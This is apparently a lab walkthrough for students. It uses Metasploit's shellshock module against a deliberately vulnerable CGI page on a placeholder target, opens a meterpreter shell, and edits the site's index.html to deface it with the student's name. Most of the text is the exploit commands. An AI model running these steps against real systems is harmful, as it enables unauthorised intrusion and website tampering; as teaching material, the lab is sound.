- Open 'VMWare Workstation Pro'
- Click on 'Kali Linux 2021' on the left side list of VMs
- Right click again on 'Kali Linux 2021' and click 'Settings'.
- Select 'Network Adapter' and change it to 'Bridged'
- Hit the Play Button to start the VM.
- Username: kali
- Password: kali
- Click the top left logo to search for firefox.
- Open your browser and head to http://<TARGET_IP>:8080
- Click the Black Box with the "$_" to open the terminal.
This will open the Metasploit Console.
msfconsole
Here, you are searching for the shellshock vulnerability to use.
search shellshock
This is selecting the shellshock exploit.
use 1
This is seeing the module and payload options that will be configured.
options
Setting the vulnerable cgi page to utilize.
set targeturi /cgi-bin/vulnerable
Setting the target hosting the site that we will attack.
set rhosts <TARGET_IP>
Setting the port the website is being hosted on.
set rport 8080
Attack the box!
exploit
With your meterpreter shell, now you can modify the website.
Most websites by default keep their files in /var/www. In our case, the index.html file contains the main page of the website.
Use the edit /var/www/index.html command to edit the file. Add your name to the website!
- Once you are in the text editor, press the 'i' key to go into insert mode.
- Use the arrow keys to move down to the < li > section
- Once you add your name, hit the 'ESC' key, type ':wq' and hit 'Enter'
Now visit the website in your browser and see your name publicly hosted on the target site!!